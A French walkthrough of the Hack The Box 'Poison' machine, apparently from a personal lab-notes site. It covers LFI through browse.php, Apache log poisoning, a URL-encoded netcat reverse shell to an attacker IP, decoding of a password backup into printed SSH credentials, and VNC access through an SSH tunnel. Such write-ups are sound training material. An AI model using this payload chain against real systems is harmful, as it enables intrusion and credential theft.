Poison

LFI VNC

Nom machine : Poison
Difficulté : Moyenne
OS : FreeBSD

Enumération

NMAP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

HTTP (80)

Nous cliquons sur submit. Dans l'URL il y a la page "browse.php" suivi de file, nous allons tenter une LFI et cela marche !

Accès initial

Le système d'exploitation est freeBSD, nous n'allons donc pas tenter les fichiers log habituels. Une rapide recherche internet nous mène à "/var/log/httpd-access.log". Et nous avons bien accès au fichier.

How do I find Apache http server log files?Code A Site Blog

Nous allons utiliser Burp pour faire une attaque de Log Poisoning.

Nous allons pouvoir utiliser un reverse shell (encodé url).

/browse.php?file=/var/log/httpd-access.log&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.12%201235%20%3E%2Ftmp%2Ff

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235
listening on [any] 1235 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.84] 43912
sh: can't access tty; job control turned off
$ whoami
www

$ cat pwdbackup.txt 
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Nous allons essayer de le déchiffrer, nous possédons un précieux indice... Nous allons donc déchiffrer du base64 le nombre de fois demandés.

charix:Charix!2#4%6&8(0

┌──(kali㉿kali)-[~]
└─$ ssh charix@10.10.10.84
(charix@10.10.10.84) Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Elévation des privilèges

Nous trouvons un dossier protégé zip "secret.zip". Nous le téléchargons sur notre machine afin d'utiliser zip2john et de cracker le mot de passe : sans résultat. Nous essayons avec le mot de passe de charix, et cela fonctionne !

┌──(kali㉿kali)-[~/htb]
└─$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password: 
 extracting: secret

Nous ne savons pas quoi faire avec ce fichier...

charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.12.38570      ESTABLISHED
tcp4       0      0 10.10.10.84.22         10.10.14.12.40542      ESTABLISHED
tcp4       0      0 10.10.10.84.43912      10.10.14.12.1235       CLOSE_WAIT
tcp4       0      0 10.10.10.84.80         10.10.14.12.33380      CLOSE_WAIT
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

5801 et 5901 : VNC Nous allons effectuer une redirection de port

┌──(kali㉿kali)-[~]
└─$ ssh -D 50080 charix@10.10.10.84
(charix@10.10.10.84) Password for charix@Poison:

configurer proxychains

Lorsqu'on veut se connecter, on nous demande le mot de passe. Et si on essayait le fichier trouvé ?

┌──(kali㉿kali)-[~/htb]
└─$ proxychains vncviewer localhost:5901 -passwd secret

Cela marche ! Nous aurions pu aussi trouver un script permettant de retrouer le mot de passe en clair du fichier secret.

PrécédentLinux SuivantSolidState

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (80)

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

HTTP (80)

Accès initial

Elévation des privilèges